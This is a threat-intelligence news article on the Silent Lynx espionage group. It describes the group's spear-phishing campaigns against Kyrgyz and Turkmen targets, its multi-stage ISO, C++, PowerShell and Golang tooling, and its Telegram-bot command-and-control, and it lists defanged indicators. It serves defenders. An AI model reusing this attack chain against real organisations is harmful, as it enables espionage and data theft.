A newly identified threat actor, Silent Lynx, has been linked to a series of sophisticated cyberattacks targeting organizations in Kyrgyzstan and Turkmenistan.
Silent Lynx: Targeting Central Asia’s Key Sectors
According to Seqrite Labs researcher Subhajeet Singha, this elusive group has previously launched attacks on Eastern European and Central Asian government think tanks, particularly those involved in economic policy-making and banking. Their latest activities have been attributed to a Kazakhstan-based threat actor with a medium level of confidence.
Spear-Phishing and Multi-Stage Payloads
Silent Lynx employs spear-phishing emails to initiate their attacks, embedding malicious RAR archives that serve as delivery mechanisms for remote access malware. Their primary targets include embassies, government-backed banks, legal professionals, and research institutions.
The first campaign, detected on December 27, 2024, uses an ISO file within a RAR archive, deploying:
A malicious C++ binary
A decoy PDF document
A PowerShell script that communicates via Telegram bots (@south_korea145_bot and @south_afr_angl_bot) to execute commands and exfiltrate sensitive data.
Attackers leverage curl commands to retrieve additional payloads from compromised domains such as pweobmxdlboi[.]com and Google Drive.
Second Campaign: Golang-Based Reverse Shell
In another attack variant, Silent Lynx distributes a malicious RAR archive containing:
A decoy PDF file
A Golang-based executable designed to establish a reverse shell to an attacker-controlled server (185.122.171[.]22:8082).
Silent Lynx and YoroTrooper: Tactical Overlaps
Seqrite Labs observed tactical similarities between Silent Lynx and YoroTrooper (aka SturgeonPhisher), a group known for targeting Commonwealth of Independent States (CIS) nations using PowerShell and Golang tools.
A Stealthy and Persistent Espionage Operation
Silent Lynx’s campaigns highlight an advanced, multi-stage cyberattack methodology, leveraging:
ISO files as initial infection vectors
C++ loaders to execute malicious scripts
PowerShell scripts for system manipulation
Golang implants to maintain persistent access
The group’s dependence on Telegram bots for command-and-control (C2), combined with their use of decoy documents and targeted espionage, underscores their strategic focus on Central Asia and SPECA (Special Programme for the Economies of Central Asia) nations.
Conclusion: A Growing Cyber Threat
Silent Lynx represents an emerging cyber espionage threat with a highly adaptable toolkit. Security professionals and organizations operating in Eastern Europe and Central Asia must bolster their email security defenses, implement advanced threat detection, and stay vigilant against multi-stage cyber threats.
Stay Updated on the Latest Cyber Threats!